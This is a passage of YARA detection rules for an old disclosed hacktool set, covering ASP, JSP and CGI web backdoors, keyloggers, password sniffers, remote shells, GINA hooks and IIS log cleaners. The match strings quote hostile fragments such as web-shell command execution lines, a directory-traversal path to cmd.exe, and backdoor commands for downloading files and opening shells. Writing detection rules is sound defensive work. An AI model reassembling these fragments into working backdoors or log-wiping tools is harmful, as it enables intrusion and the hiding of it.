    $s0 = "= Click here if you want to get your registered copy of ASPack" ascii fullword
    $s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" ascii fullword
    $s2 = "E-Mail:                      shinlan@km169.net" ascii fullword
    $s8 = ";  Please, translate text only after simbol '='" ascii fullword
    $s19 = "= Compress with ASPack" ascii fullword
  condition:
    all of them
}

rule aspbackdoor_EDIR {
  meta:
    description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
  strings:
    $s1 = "response.write \"<a href='index.asp'>" ascii fullword
    $s3 = "if Request.Cookies(\"password\")=\"" ascii
    $s6 = "whichdir=server.mappath(Request(\"path\"))" ascii fullword
    $s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" ascii fullword
    $s19 = "whichdir=Request(\"path\")" ascii fullword
  condition:
    all of them
}

rule sig_238_filespy {
  meta:
    description = "Disclosed hacktool set (old stuff) - file filespy.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 50
    hash = "89d8490039778f8c5f07aa7fd476170293d24d26"
  strings:
    $s0 = "Hit [Enter] to begin command mode..." ascii fullword
    $s1 = "If you are in command mode," ascii fullword
    $s2 = "[/l] lists all the drives the monitor is currently attached to" ascii fullword
    $s9 = "FileSpy.exe" wide fullword
    $s12 = "ERROR starting FileSpy..." ascii fullword
    $s16 = "exe\\filespy.dbg" ascii fullword
    $s17 = "[/d <drive>] detaches monitor from <drive>" ascii fullword
    $s19 = "Should be logging to screen..." ascii fullword
    $s20 = "Filmon:  Unknown log record type" ascii fullword
  condition:
    7 of them
}

rule ByPassFireWall_zip_Folder_Ie {
  meta:
    description = "Disclosed hacktool set (old stuff) - file Ie.dll"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "d1b9058f16399e182c9b78314ad18b975d882131"
  strings:
    $s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" ascii fullword
    $s1 = "LOADER ERROR" ascii fullword
    $s5 = "The procedure entry point %s could not be located in the dynamic link library %s" ascii fullword
    $s7 = "The ordinal %u could not be located in the dynamic link library %s" ascii fullword
  condition:
    all of them
}

rule EditKeyLogReadMe {
  meta:
    description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
  strings:
    $s0 = "editKeyLog.exe KeyLog.exe," ascii fullword
    $s1 = "WinEggDrop.DLL" ascii fullword
    $s2 = "nc.exe" ascii fullword
    $s3 = "KeyLog.exe" ascii fullword
    $s4 = "EditKeyLog.exe" ascii fullword
    $s5 = "wineggdrop" ascii fullword
  condition:
    3 of them
}

rule PassSniffer_zip_Folder_readme {
  meta:
    description = "Disclosed hacktool set (old stuff) - file readme.txt"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
  strings:
    $s0 = "PassSniffer.exe" ascii fullword
    $s1 = "POP3/FTP Sniffer" ascii fullword
    $s2 = "Password Sniffer V1.0" ascii fullword
  condition:
    1 of them
}

rule sig_238_gina {
  meta:
    description = "Disclosed hacktool set (old stuff) - file gina.reg"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
  strings:
    $s0 = "\"gina\"=\"gina.dll\"" ascii fullword
    $s1 = "REGEDIT4" ascii fullword
    $s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" ascii fullword
  condition:
    all of them
}

rule splitjoin {
  meta:
    description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
  strings:
    $s0 = "Not for distribution without the authors permission" wide fullword
    $s2 = "Utility to split and rejoin files.0" wide fullword
    $s5 = "Copyright (c) Angus Johnson 2001-2002" wide fullword
    $s19 = "SplitJoin" wide fullword
  condition:
    all of them
}

rule EditKeyLog {
  meta:
    description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
  strings:
    $s1 = "Press Any Ke" ascii fullword
    $s2 = "Enter 1 O" ascii fullword
    $s3 = "Bon >0 & <65535L" ascii fullword
    $s4 = "--Choose " ascii fullword
  condition:
    all of them
}

rule PassSniffer {
  meta:
    description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
  strings:
    $s2 = "Sniff" ascii fullword
    $s3 = "GetLas" ascii fullword
    $s4 = "VersionExA" ascii fullword
    $s10 = " Only RuntUZ" ascii fullword
    $s12 = "emcpysetprintf\\" ascii fullword
    $s13 = "WSFtartup" ascii fullword
  condition:
    all of them
}

rule aspfile2 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
  strings:
    $s0 = "response.write \"command completed success!\" " ascii fullword
    $s1 = "for each co in foditems " ascii fullword
    $s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " ascii fullword
    $s19 = "<title>Hello! Welcome </title>" ascii fullword
  condition:
    all of them
}

rule UnPack_rar_Folder_InjectT {
  meta:
    description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
  strings:
    $s0 = "%s -Install                          -->To Install The Service" ascii fullword
    $s1 = "Explorer.exe" ascii fullword
    $s2 = "%s -Start                            -->To Start The Service" ascii fullword
    $s3 = "%s -Stop                             -->To Stop The Service" ascii fullword
    $s4 = "The Port Is Out Of Range" ascii fullword
    $s7 = "Fail To Set The Port" ascii fullword
    $s11 = "\\psapi.dll" ascii fullword
    $s20 = "TInject.Dll" ascii fullword
    $x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" ascii fullword
    $x2 = "injectt.exe" ascii fullword
  condition:
    (1 of ($x*)) and (3 of ($s*))
}

rule Jc_WinEggDrop_Shell {
  meta:
    description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
  strings:
    $s0 = "Sniffer.dll" ascii fullword
    $s4 = ":Execute net.exe user Administrator pass" ascii fullword
    $s5 = "Fport.exe or mport.exe " ascii fullword
    $s6 = ":Password Sniffering Is Running |Not Running " ascii fullword
    $s9 = ": The Terminal Service Port Has Been Set To NewPort" ascii fullword
    $s15 = ": Del www.exe                   " ascii fullword
    $s20 = ":Dir *.exe                    " ascii fullword
  condition:
    2 of them
}

rule aspbackdoor_asp1 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file asp1.txt"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
  strings:
    $s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " ascii fullword
    $s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " ascii fullword
    $s6 = "set rs=conn.execute (sql)%> " ascii fullword
    $s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " ascii fullword
    $s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " ascii fullword
    $s15 = "sql=\"select * from scjh\" " ascii fullword
  condition:
    all of them
}

rule QQ_zip_Folder_QQ {
  meta:
    description = "Disclosed hacktool set (old stuff) - file QQ.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
  strings:
    $s0 = "EMAIL:haoq@neusoft.com" wide fullword
    $s1 = "EMAIL:haoq@neusoft.com" wide fullword
    $s4 = "QQ2000b.exe" wide fullword
    $s5 = "haoq@neusoft.com" ascii fullword
    $s9 = "QQ2000b.exe" ascii fullword
    $s10 = "\\qq2000b.exe" ascii fullword
    $s12 = "WINDSHELL STUDIO[WINDSHELL " wide fullword
    $s17 = "SOFTWARE\\HAOQIANG\\" ascii fullword
  condition:
    5 of them
}

rule UnPack_rar_Folder_TBack {
  meta:
    description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
  strings:
    $s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" ascii fullword
    $s1 = "http://IP/a.exe a.exe                 -->Download A File" ascii fullword
    $s2 = "StopSniffer                           -->Stop Pass Sniffer" ascii fullword
    $s3 = "TerminalPort Port                     -->Set New Terminal Port" ascii fullword
    $s4 = "Example: Http://12.12.12.12/a.exe abc.exe" ascii fullword
    $s6 = "Create Password Sniffering Thread Successfully. Status:Logging" ascii fullword
    $s7 = "StartSniffer NIC                      -->Start Sniffer" ascii fullword
    $s8 = "Shell                                 -->Get A Shell" ascii fullword
    $s11 = "DeleteService ServiceName             -->Delete A Service" ascii fullword
    $s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" ascii fullword
    $s13 = "Online                                -->List All Connected IP" ascii fullword
    $s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" ascii fullword
    $s16 = "Example: Set REG_SZ Test Trojan.exe" ascii fullword
    $s18 = "Execute Program                       -->Execute A Program" ascii fullword
    $s19 = "Reboot                                -->Reboot The System" ascii fullword
    $s20 = "Password Sniffering Is Not Running" ascii fullword
  condition:
    4 of them
}

rule sig_238_cmd_2 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
  strings:
    $s0 = "Process child = Runtime.getRuntime().exec(" ascii
    $s1 = "InputStream in = child.getInputStream();" ascii fullword
    $s2 = "String cmd = request.getParameter(\"" ascii
    $s3 = "while ((c = in.read()) != -1) {" ascii fullword
    $s4 = "<%@ page import=\"java.io.*\" %>" ascii fullword
  condition:
    all of them
}

rule RangeScan {
  meta:
    description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
  strings:
    $s0 = "RangeScan.EXE" wide fullword
    $s4 = "<br><p align=\"center\"><b>RangeScan " ascii fullword
    $s9 = "Produced by isn0" ascii fullword
    $s10 = "RangeScan" wide fullword
    $s20 = "%d-%d-%d %d:%d:%d" ascii fullword
  condition:
    3 of them
}

rule XYZCmd_zip_Folder_Readme {
  meta:
    description = "Disclosed hacktool set (old stuff) - file Readme.txt"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
  strings:
    $s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" ascii fullword
    $s20 = "XYZCmd V1.0" ascii fullword
  condition:
    all of them
}

rule ByPassFireWall_zip_Folder_Inject {
  meta:
    description = "Disclosed hacktool set (old stuff) - file Inject.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
  strings:
    $s6 = "Fail To Inject" ascii fullword
    $s7 = "BtGRemote Pro; V1.5 B/{" ascii fullword
    $s11 = " Successfully" ascii fullword
  condition:
    all of them
}

rule sig_238_sqlcmd {
  meta:
    description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 40
    hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
  strings:
    $s0 = "Permission denial to EXEC command.:(" ascii fullword
    $s3 = "by Eyas<cooleyas@21cn.com>" ascii fullword
    $s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" ascii fullword
    $s5 = "Usage: %s <host> <uid> <pwd>" ascii fullword
    $s6 = "SqlCmd2.exe Inside Edition." ascii fullword
    $s7 = "Http://www.patching.net  2000/12/14" ascii fullword
    $s11 = "Example: %s 192.168.0.1 sa \"\"" ascii fullword
  condition:
    4 of them
}

rule ASPack_ASPACK {
  meta:
    description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
  strings:
    $s0 = "ASPACK.EXE" wide fullword
    $s5 = "CLOSEDFOLDER" wide fullword
    $s10 = "ASPack compressor" wide fullword
  condition:
    all of them
}

rule sig_238_2323 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file 2323.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
  strings:
    $s0 = "port - Port to listen on, defaults to 2323" ascii fullword
    $s1 = "Usage: srvcmd.exe [/h] [port]" ascii fullword
    $s3 = "Failed to execute shell" ascii fullword
    $s5 = "/h   - Hide Window" ascii fullword
    $s7 = "Accepted connection from client at %s" ascii fullword
    $s9 = "Error %d: %s" ascii fullword
  condition:
    all of them
}

rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file Install.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "95866e917f699ee74d4735300568640ea1a05afd"
  strings:
    $s1 = "http://go.163.com/sdemo" wide fullword
    $s2 = "Player.tmp" ascii fullword
    $s3 = "Player.EXE" wide fullword
    $s4 = "mailto:sdemo@263.net" ascii fullword
    $s5 = "S-Player.exe" ascii fullword
    $s9 = "http://www.BaiXue.net (" wide fullword
  condition:
    all of them
}

rule sig_238_TFTPD32 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
  strings:
    $s0 = " http://arm.533.net" ascii fullword
    $s1 = "Tftpd32.hlp" ascii fullword
    $s2 = "Timeouts and Ports should be numerical and can not be 0" ascii fullword
    $s3 = "TFTPD32 -- " wide fullword
    $s4 = "%d -- %s" ascii fullword
    $s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" ascii fullword
    $s12 = "TftpPort" ascii fullword
    $s13 = "Ttftpd32BackGround" ascii fullword
    $s17 = "SOFTWARE\\TFTPD32" ascii fullword
  condition:
    all of them
}

rule sig_238_iecv {
  meta:
    description = "Disclosed hacktool set (old stuff) - file iecv.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "6e6e75350a33f799039e7a024722cde463328b6d"
  strings:
    $s1 = "Edit The Content Of Cookie " wide fullword
    $s3 = "Accessories\\wordpad.exe" ascii fullword
    $s4 = "gorillanation.com" ascii fullword
    $s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
    $s12 = "http://nirsoft.cjb.net" ascii fullword
  condition:
    all of them
}

rule Antiy_Ports_1_21 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
  strings:
    $s0 = "AntiyPorts.EXE" wide fullword
    $s7 = "AntiyPorts MFC Application" wide fullword
    $s20 = " @Stego:" ascii fullword
  condition:
    all of them
}

rule perlcmd_zip_Folder_cmd {
  meta:
    description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
  strings:
    $s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" ascii fullword
    $s1 = "s/%20/ /ig;" ascii fullword
    $s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" ascii fullword
    $s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" ascii fullword
    $s5 = "$_ = $ENV{QUERY_STRING};" ascii fullword
    $s6 = "$execthis = $_;" ascii fullword
    $s7 = "system($execthis);" ascii fullword
    $s12 = "s/%2f/\\//ig;" ascii fullword
  condition:
    6 of them
}

rule aspbackdoor_asp3 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file asp3.txt"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
  strings:
    $s0 = "<form action=\"changepwd.asp\" method=\"post\"> " ascii fullword
    $s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " ascii fullword
    $s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " ascii fullword
    $s14 = " Windows NT " ascii fullword
    $s16 = " WIndows 2000 " ascii fullword
    $s18 = "OldPwd = Request.Form(\"OldPwd\") " ascii fullword
    $s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " ascii fullword
    $s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " ascii fullword
  condition:
    all of them
}

rule sig_238_FPipe {
  meta:
    description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
  strings:
    $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" ascii fullword
    $s1 = "Unable to resolve hostname \"%s\"" ascii fullword
    $s2 = "source port for that outbound connection being set to 53 also." ascii fullword
    $s3 = " -s    - outbound source port number" ascii fullword
    $s5 = "http://www.foundstone.com" ascii fullword
    $s20 = "Attempting to connect to %s port %d" ascii fullword
  condition:
    all of them
}

rule sig_238_concon {
  meta:
    description = "Disclosed hacktool set (old stuff) - file concon.com"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
  strings:
    $s0 = "Usage: concon \\\\ip\\sharename\\con\\con" ascii fullword
  condition:
    all of them
}

rule aspbackdoor_regdll {
  meta:
    description = "Disclosed hacktool set (old stuff) - file regdll.asp"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
  strings:
    $s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
    $s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" ascii fullword
    $s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" ascii fullword
    $s5 = "Public Property Get oFS()" ascii fullword
  condition:
    all of them
}

rule CleanIISLog {
  meta:
    description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
  strings:
    $s1 = "CleanIP - Specify IP Address Which You Want Clear." ascii fullword
    $s2 = "LogFile - Specify Log File Which You Want Process." ascii fullword
    $s8 = "CleanIISLog Ver" ascii fullword
    $s9 = "msftpsvc" ascii fullword
    $s10 = "Fatal Error: MFC initialization failed" ascii fullword
    $s11 = "Specified \"ALL\" Will Process All Log Files." ascii fullword
    $s12 = "Specified \".\" Will Clean All IP Record." ascii fullword
    $s16 = "Service %s Stopped." ascii fullword
    $s20 = "Process Log File %s..." ascii fullword
  condition:
    5 of them
}

rule sqlcheck {
  meta:
    description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
  strings:
    $s0 = "Power by eyas<cooleyas@21cn.com>" ascii fullword
    $s3 = "\\ipc$ \"\" /user:\"\"" ascii fullword
    $s4 = "SQLCheck can only scan a class B network. Try again." ascii fullword
    $s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" ascii fullword
    $s20 = "Usage: SQLCheck <StartIP> <EndIP>" ascii fullword
  condition:
    3 of them
}

rule sig_238_RunAsEx {
  meta:
    description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
  strings:
    $s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" ascii fullword
    $s8 = "cmd.bat" ascii fullword
    $s9 = "Note: This Program Can'nt Run With Local Machine." ascii fullword
    $s11 = "%s Execute Succussifully." ascii fullword
    $s12 = "winsta0" ascii fullword
    $s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" ascii fullword
  condition:
    4 of them
}

rule sig_238_nbtdump {
  meta:
    description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
  strings:
    $s0 = "Creation of results file - \"%s\" failed." ascii fullword
    $s1 = "c:\\>nbtdump remote-machine" ascii fullword
    $s7 = "Cerberus NBTDUMP" ascii fullword
    $s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" ascii fullword
    $s18 = "<P><H3>Account Information</H3><PRE>" wide fullword
    $s19 = "%s's password is %s</H3>" wide fullword
    $s20 = "%s's password is blank</H3>" wide fullword
  condition:
    5 of them
}

rule sig_238_Glass2k {
  meta:
    description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
  strings:
    $s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" ascii fullword
    $s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" ascii fullword
    $s3 = "WINNT\\System32\\stdole2.tlb" ascii fullword
    $s4 = "Glass2k.exe" wide fullword
    $s7 = "NeoLite Executable File Compressor" ascii fullword
  condition:
    all of them
}

rule SplitJoin_V1_3_3_rar_Folder_3 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "21409117b536664a913dcd159d6f4d8758f43435"
  strings:
    $s2 = "ie686@sohu.com" ascii fullword
    $s3 = "splitjoin.exe" ascii fullword
    $s7 = "SplitJoin" ascii fullword
  condition:
    all of them
}

rule aspbackdoor_EDIT {
  meta:
    description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
  strings:
    $s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" ascii fullword
    $s2 = "Set thisfile = fs.GetFile(whichfile)" ascii fullword
    $s3 = "response.write \"<a href='index.asp'>" ascii fullword
    $s5 = "if Request.Cookies(\"password\")=\"juchen\" then " ascii fullword
    $s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" ascii fullword
    $s7 = "color: rgb(255,0,0); text-decoration: underline }" ascii fullword
    $s13 = "if Request(\"creat\")<>\"yes\" then" ascii fullword
  condition:
    5 of them
}

rule aspbackdoor_entice {
  meta:
    description = "Disclosed hacktool set (old stuff) - file entice.asp"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
  strings:
    $s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" ascii fullword
    $s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" ascii fullword
    $s4 = "conndb.Execute(sqllanguage)" ascii fullword
    $s5 = "<!--#include file=sqlconn.asp-->" ascii fullword
    $s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" ascii fullword
  condition:
    all of them
}

rule FPipe2_0 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "891609db7a6787575641154e7aab7757e74d837b"
  strings:
    $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" ascii fullword
    $s1 = "Unable to resolve hostname \"%s\"" ascii fullword
    $s2 = " -s    - outbound connection source port number" ascii fullword
    $s3 = "source port for that outbound connection being set to 53 also." ascii fullword
    $s4 = "http://www.foundstone.com" ascii fullword
    $s19 = "FPipe" ascii fullword
  condition:
    all of them
}

rule InstGina {
  meta:
    description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "5317fbc39508708534246ef4241e78da41a4f31c"
  strings:
    $s0 = "To Open Registry" ascii fullword
    $s4 = "I love Candy very much!!" ascii
    $s5 = "GinaDLL" ascii fullword
  condition:
    all of them
}

rule ArtTray_zip_Folder_ArtTray {
  meta:
    description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
  strings:
    $s0 = "http://www.brigsoft.com" wide fullword
    $s2 = "ArtTrayHookDll.dll" ascii fullword
    $s3 = "ArtTray Version 1.0 " wide fullword
    $s16 = "TRM_HOOKCALLBACK" ascii fullword
  condition:
    all of them
}

rule sig_238_findoor {
  meta:
    description = "Disclosed hacktool set (old stuff) - file findoor.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
  strings:
    $s0 = "(non-Win32 .EXE or error in .EXE image)." ascii fullword
    $s8 = "PASS hacker@hacker.com" ascii fullword
    $s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" ascii fullword
    $s10 = "MAIL FROM:hacker@hacker.com" ascii fullword
    $s11 = "http://isno.yeah.net" ascii fullword
  condition:
    4 of them
}

rule aspbackdoor_ipclear {
  meta:
    description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
  strings:
    $s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" ascii fullword
    $s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" ascii fullword
    $s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" ascii fullword
    $s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" ascii fullword
    $s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" ascii fullword
  condition:
    all of them
}

rule WinEggDropShellFinal_zip_Folder_InjectT {
  meta:
    description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
  strings:
    $s0 = "Packed by exe32pack" ascii
    $s1 = "2TInject.Dll" ascii fullword
    $s2 = "Windows Services" ascii fullword
    $s3 = "Findrst6" ascii fullword
    $s4 = "Press Any Key To Continue......" ascii fullword
  condition:
    all of them
}

rule sig_238_rshsvc {
  meta:
    description = "Disclosed hacktool set (old stuff) - file rshsvc.bat"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75"
  strings:
    $s0 = "if not exist %1\\rshsetup.exe goto ERROR2" ascii fullword
    $s1 = "ECHO rshsetup.exe is not found in the %1 directory" ascii fullword
    $s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" ascii fullword
    $s10 = "copy %1\\rshsvc.exe" ascii fullword
    $s12 = "ECHO Use \"net start rshsvc\" to start the service." ascii fullword
    $s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" ascii fullword
    $s18 = "pushd %SystemRoot%\\system32" ascii fullword
  condition:
    all of them
}

rule gina_zip_Folder_gina {
  meta:
    description = "Disclosed hacktool set (old stuff) - file gina.dll"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
  strings:
    $s0 = "NEWGINA.dll" ascii fullword
    $s1 = "LOADER ERROR" ascii fullword
    $s3 = "WlxActivateUserShell" ascii fullword
    $s6 = "WlxWkstaLockedSAS" ascii fullword
    $s13 = "WlxIsLockOk" ascii fullword
    $s14 = "The procedure entry point %s could not be located in the dynamic link library %s" ascii fullword
    $s16 = "WlxShutdown" ascii fullword
    $s17 = "The ordinal %u could not be located in the dynamic link library %s" ascii fullword
  condition:
    all of them
}

rule superscan3_0 {
  meta:
    description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
  strings:
    $s0 = "\\scanner.ini" ascii fullword
    $s1 = "\\scanner.exe" ascii fullword
    $s2 = "\\scanner.lst" ascii fullword
    $s4 = "\\hensss.lst" ascii fullword
    $s5 = "STUB32.EXE" wide fullword
    $s6 = "STUB.EXE" wide fullword
    $s8 = "\\ws2check.exe" ascii fullword
    $s9 = "\\trojans.lst" ascii fullword
    $s10 = "1996 InstallShield Software Corporation" wide fullword
